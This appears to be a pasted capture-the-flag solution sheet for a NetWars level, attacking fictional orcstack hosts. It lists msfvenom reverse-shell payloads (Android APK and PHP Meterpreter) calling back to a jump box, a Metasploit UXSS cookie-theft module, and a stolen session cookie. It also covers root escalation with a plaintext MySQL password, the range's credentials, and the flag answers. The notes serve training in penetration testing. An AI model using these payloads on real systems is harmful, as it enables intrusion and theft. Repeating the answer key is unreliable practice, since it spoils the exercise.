Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- 10.2.2.2
- port 52080
- 10.2.2.2
- ssh -i ~/Downloads/netwars.priv -R 52080:localhost:52080 lurkers@netwars-ng.counterhack.com
- alias jumpbox='ssh -i ~/netwars.priv aoluser927@netwars-ng.counterhack.com -p 62201'
- alias proxy='ssh -i ~/netwars.priv aoluser927@netwars-ng.counterhack.com -p 62201 -D 8080 -N'
- level 3
- ---------------------------
- Question 1
- ---------------------------
- Register for an account from www.orcstack.com. What is the User Agent (entire line, beginning with "User-Agent: ") of the Android device that connects using the "Deploy URL" page?
- Target: android-web.orcstack.com
- In order to see the HTTP traffic of the Android device, you need either a Man-in-the-Middle, have access to the HTTP client, or be the destination. Of these three options, as of now you only have access to the last option. Be sure to form the URL using the IP address of the SSH jump box you're currently connected to.
- The HTTP protocol specifies the HTTP client sends the request (including its User Agent) upon making a TCP connection. You need to set up a TCP listener on a high unused port* of the SSH jump box and create a URL to the IP and port of your TCP listener. * You need to use a high port because you're not root (which is required to listen on ports below 1024, and because your SSH jump box is shared with other people you may need to choose a different port if the one you chose was already in use.
- ---------------------------
- Solution:
- fire off a listener on your jump box.
- nc -lvp 12345
- Submit a link to the website:
- http://10.2.2.2
- User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VMware Virtual Platform Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
- ---------------------------
- Question 2
- ---------------------------
- What is the flag located at /data/data/flag.txt?
- Target: android-apk.orcstack.com
- In the android-web questions, you entered a URL that an Android device would browse to using a mobile web browser. In this question, you'll enter a URL to an APK file that a different Android device will install and run. Using that Android program, you'll need to gain some kind of shell access, elevate your privileges, and read /data/data/flag.txt on the Android device itself. You may have used Metasploit and msfvenom to create EXE files that "phone home" with Meterpreter when run on Windows targets, or PHP files that do the same when interpreted on PHP servers. Similarly, msfvenom can create APK files that have an Android Meterpreter on them.
- ---------------------------
- Solution:
- msfvenom -p android/meterpreter/reverse_tcp LHOST=10.2.2.2 LPORT=52080 R > boom.apk
- http://10.2.2.2/~lurkers/boom.apk
- use exploit/multi/handler
- set payload android/meterpreter/reverse_tcp
- set lhost 0.0.0.0
- set lport 52080
- exploit -j
- adb root
- cat /data/data/flag.txt
- e2415cb7f63df0c9de23362326ad3c37a9adfc96
- ---------------------------
- Question 3
- ---------------------------
- A common password management application is installed on this Android device. Recover a flag stored in plain text inside a database used by this application.
- Target: android-apk.orcstack.com
- You'll need to have already answered the previous question to have the necessary access to the Android device to answer this question. First, find the correct application folder under /data/data. Then, transfer the entire folder and its contents using tar and netcat back to your home folder on the SSH jump box. Finally, examine the database inside that folder carefully.
- ---------------------------
- Solution:
- cd /data/data/com.easylogics.safe.keeper.password.secure/databases/
- sqlite3 SafeKeeper
- .dump
- cedf6dc6b8893245ac066589860274fe80e6370f
- ---------------------------
- Question 4
- ---------------------------
- Using the credentials gathered in answering another question, log in to www.orcstack.com and access the Dashboard to find an unpublished page containing a flag.
- Target: www.orcstack.com
- ---------------------------
- Solution:
- http://www.orcstack.com/Admin
- administrator
- Uruk-Hai
- 80b4a4e3cbc8827b579b9873c5efd8d6bd7c977e
- ---------------------------
- Question 5
- ---------------------------
- Using the credentials gathered in answering another question, log in to www.orcstack.com and find a SHA1 hash used as a key to send commands to the development server over HTTP.
- Target: www.orcstack.com
- This question requires thorough pillaging of information under the Dashboard of the web server on www.orcstack.com.
- How do the "Deploy URL" and "Deploy APK" pages work?
- ---------------------------
- Solution:
- look in workflows tabs after logging in
- type=apk
- url={Content.Fields.AndroidAPK.URL}
- name={Content.Fields.AndroidAPK.ApplicationName}
- key=5c9b478a5576dbf8537adfc9ebf075c613ce022e
- ---------------------------
- Question 6
- ---------------------------
- Exploit a vulnerability in the Android version used for the "Deploy URL" capability of www.orcstack.com to gain access to the web cookies for http://blog.orcstack.com/. Use those cookies to gain access to a flag located in a non-Published page.
- Target: blog.orcstack.com
- Unless there's a Universal Cross-Site Scripting flaw, normally a web browser accessing (for example) http://google.com/ would never reveal cookies for a separate domain such as http://bing.com/. What Android version is being used by this device?
- msf > info auxiliary/gather/android_stock_browser_uxss The above module is effective against this Android device. Use the msfconsole utility to select this module and then use the "Deploy URL" capability of www.orcstack.com to gather the cookies for http://blog.orcstack.com/. Once you've done this, add the same cookies to your local browser, configure your local browser to use an SSH proxy so it can connect to the Orc Stack DMZ, then browse to http://blog.orcstack.com.
- ---------------------------
- Solution:
- use auxiliary/gather/android_stock_browser_uxss
- set SRVPORT 50790
- set TARGET_URLS http://blog.orcstack.com
- set ssl true
- edit cookie:
- name: SESSd2caba14ddc97ae8122a3d641304185c
- content: b2MREdZCPAoa9bvseV3QWCfqlgyDTOOW-iUXwR6rvIA
- 669edf6917c00d6c298676be757fef05634c614b
- ---------------------------
- Question 7
- ---------------------------
- Use an authenticated administrative web session on http://blog.orcstack.com/ to gain shell access as a limited user, then submit the contents of /flag.txt.
- Target: blog.orcstack.com
- ---------------------------
- Solution:
- msfvenom -p php/meterpreter_reverse_tcp LHOST=10.2.2.2 LPORT=21455 -f raw > shell.php
- use multi/handler
- set payload php/meterpreter_reverse_tcp
- set lhost 0.0.0.0
- set lport 21455
- run -j
- cat /flag.txt
- 4c9ef22b86ca78e8d265e007128b449f4a9ef68c
- ---------------------------
- Question 8
- ---------------------------
- Gain root privileges on blog.orcstack.com and submit the contents of /root/flag.txt.
- Target: blog.orcstack.com
- ---------------------------
- Solution:
- cat /usr/local/bin/mysql-connect.sh
- mysql --column-names --compress --host=localhost --wait -u root --password="DwarfTosser"
- mysql --host=localhost -u root --password="DwarfTosser"
- /usr/bin/python -c 'import pty; pty.spawn("/bin/bash")'
- su
- DwarfTosser
- cat /root/flag.txt
- a74687bbf8d6d21d555680bb98b6e1f9bf498d58
- ---------------------------
- Question 9-10?
- ---------------------------
- Using information found in answering another question, find the credentials to a service on www.orcstack.com, then submit the flag found inside.
- Target: www.orcstack.com
- ---------------------------
- Solution:
- 67836526fe7fcce735af56939378d7b1fd7e2f38
- System Login:
- psexec to www with
- Username: Administrator
- Password: Magical_Unicorns
- 67836526fe7fcce735af56939378d7b1fd7e2f38
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement